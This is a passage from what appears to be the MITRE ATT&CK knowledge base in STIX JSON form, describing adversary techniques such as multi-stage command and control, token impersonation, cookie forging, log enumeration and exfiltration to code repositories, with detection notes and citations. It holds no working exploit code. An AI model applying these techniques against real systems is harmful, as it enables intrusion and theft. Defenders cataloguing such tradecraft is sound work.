"https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits"}, {"source_name": "URI Use", "description": "Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.", "url": "https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf"}, {"source_name": "iOS URL Scheme", "description": "Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.", "url": "https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html"}, {"source_name": "Intezer App Service Phishing", "description": "Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.", "url": "https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/"}, {"source_name": "Proofpoint TA407 September 2019", "description": "Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.", "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian"}, {"source_name": "Cofense-redirect", "description": "Raymond, Nathaniel. (2023, August 16). Major Energy Company Targeted in Large QR Code Phishing Campaign. Retrieved January 17, 2024.", "url": "https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/"}, {"source_name": "mandiant-masking", "description": "Simonian, Nick. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved January 17, 2024.", "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Multi-Stage Channels", "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", "created": "2017-05-31T21:31:15.935Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1104", "external_id": "T1104"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-11T20:22:14.359Z", "name": "Financial Theft", "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Blake Strom, Microsoft Threat Intelligence", "Pawel Partyka, Microsoft Threat Intelligence", "Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "SaaS", "Google Workspace"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", "created": "2023-08-18T20:50:04.222Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1657", "external_id": "T1657"}, {"source_name": "VEC", "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.", "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers."}, {"source_name": "Crowdstrike-leaks", "description": "Crowdstrike. (2020, September 24). Double Trouble: Ransomware with Data Leak Extortion, Part 1. Retrieved December 6, 2023.", "url": "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/"}, {"source_name": "Mandiant-leaks", "description": "DANIEL KAPELLMANN ZAFRA, COREY HIDELBRANDT, NATHAN BRUBAKER, KEITH LUNDEN. (2022, January 31). 1 in 7 OT Ransomware Extortion Attacks Leak Critical Operational Technology Information. Retrieved August 18, 2023.", "url": "https://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs"}, {"source_name": "DOJ-DPRK Heist", "description": "Department of Justice. (2021). 3 North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyber-attacks and Financial Crimes Across the Globe. Retrieved August 18, 2023.", "url": "https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyber-attacks-and"}, {"source_name": "FBI-BEC", "description": "FBI. (2022). FBI 2022 Congressional Report on BEC and Real Estate Wire Fraud. Retrieved August 18, 2023.", "url": "https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-real-estate-wire-fraud-111422.pdf/view"}, {"source_name": "FBI-ransomware", "description": "FBI. (n.d.). Ransomware. Retrieved August 18, 2023.", "url": "https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf"}, {"source_name": "AP-NotPetya", "description": "FRANK BAJAK AND RAPHAEL SATTER. (2017, June 30). Companies still hobbled from fearsome cyberattack. Retrieved August 18, 2023.", "url": "https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8873e7f9f229c2"}, {"source_name": "Internet crime report 2022", "description": "IC3. (2022). 2022 Internet Crime Report. Retrieved August 18, 2023.", "url": "https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf"}, {"source_name": "BBC-Ronin", "description": "Joe Tidy. (2022, March 30). Ronin Network: What a $600m hack says about the state of crypto. Retrieved August 18, 2023.", "url": "https://www.bbc.com/news/technology-60933174"}, {"source_name": "wired-pig butchering", "description": "Lily Hay Newman. (n.d.). \u2018Pig Butchering\u2019 Scams Are Now a $3 Billion Threat. Retrieved August 18, 2023.", "url": "https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/"}, {"source_name": "NYT-Colonial", "description": "Nicole Perlroth. (2021, May 13). Colonial Pipeline paid 75 Bitcoin, or roughly $5 million, to hackers.. Retrieved August 18, 2023.", "url": "https://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:07.260Z", "name": "Spoof Reporting Message", "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. \n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) ", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "evasion"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "impair-process-control"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Operational Databases: Device Alarm", "Windows Registry: Windows Registry Key Modification", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0856", "external_id": "T0856"}, {"source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Execution Guardrails", "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Nick Carr, Mandiant"], "x_mitre_deprecated": false, "x_mitre_detection": "Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Host Forensic Analysis", "Signature-based Detection", "Static File Analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "created": "2019-01-31T02:10:08.261Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1480", "external_id": "T1480"}, {"source_name": "FireEye Outlook Dec 2019", "description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html"}, {"source_name": "FireEye Kevin Mandia Guardrails", "description": "Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.", "url": "https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Cloud Storage Object Discovery", "description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Regina Elwell", "Isif Ibrahima, Mandiant"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. \nMonitor cloud logs for API calls used for file or object enumeration for unusual activity. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8565825b-21c8-4518-b75e-cbc4c717a156", "created": "2021-10-01T17:58:26.445Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1619", "external_id": "T1619"}, {"source_name": "ListObjectsV2", "description": "Amazon - ListObjectsV2. Retrieved October 4, 2021.", "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html"}, {"source_name": "List Blobs", "description": "Microsoft - List Blobs. (n.d.). Retrieved October 4, 2021.", "url": "https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:07.457Z", "name": "Exploitation of Remote Services", "description": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK)\n\nICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (wormable) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts. (Citation: Joe Slowik April 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Application Log: Application Log Content", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0866", "external_id": "T0866"}, {"source_name": "Enterprise ATT&CK", "description": "Enterprise ATT&CK Exploitation of Remote Services Retrieved. 2019/10/27 ", "url": "https://attack.mitre.org/techniques/T1210/"}, {"source_name": "Joe Slowik April 2019", "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-19T21:25:10.511Z", "name": "Web Cookies", "description": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.\n\nAdversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.\n\nOnce forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Jack Burns, HubSpot"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "SaaS", "IaaS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "created": "2020-12-17T02:14:34.178Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1606/001", "external_id": "T1606.001"}, {"source_name": "Volexity SolarWinds", "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.", "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/"}, {"source_name": "Unit 42 Mac Crypto Cookies January 2019", "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019.", "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/"}, {"source_name": "Pass The Cookie", "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-30T22:18:46.711Z", "name": "Log Enumeration", "description": "Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).\n\nHost binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent\u2019s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)\n\nAdversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Bilal Bahad\u0131r Yenici"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "IaaS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", "created": "2023-07-10T16:50:57.587Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1654", "external_id": "T1654"}, {"source_name": "SIM Swapping and Abuse of the Microsoft Azure Serial Console", "description": "Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack. Retrieved June 2, 2023.", "url": "https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial"}, {"source_name": "Cadet Blizzard emerges as novel threat actor", "description": "Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/"}, {"source_name": "WithSecure Lazarus-NoPineapple Threat Intel Report 2023", "description": "Ruohonen, S. & Robinson, S. (2023, February 2). No Pineapple! -DPRK Targeting of Medical Research and Technology Sector. Retrieved July 10, 2023.", "url": "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-01-10T17:57:36.177Z", "name": "Token Impersonation/Theft", "description": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.\n\nAn adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.\n\nWhen an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jonny Johnson"], "x_mitre_deprecated": false, "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Windows User Account Control", "System access controls", "File system access controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", "created": "2020-02-18T16:39:06.289Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1134/001", "external_id": "T1134.001"}, {"source_name": "Microsoft Command-line Logging", "description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.", "url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing"}, {"source_name": "DuplicateToken function", "description": "Microsoft. (2021, October 12). DuplicateToken function (securitybaseapi.h). Retrieved January 8, 2024.", "url": "https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-15T19:08:16.882Z", "name": "Exfiltration to Code Repository", "description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\n\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "created": "2020-03-09T14:51:11.772Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1567/001", "external_id": "T1567.001"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-04-14T22:27:04.095Z", "name": "Cloud Services", "description": "Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. \n\nMany enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as Connect-AZAccount for Azure PowerShell, Connect-MgGraph for Microsoft Graph PowerShell, and gcloud auth login for the Google Cloud CLI.\n\nIn some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Office 365", "Azure AD", "SaaS", "IaaS", 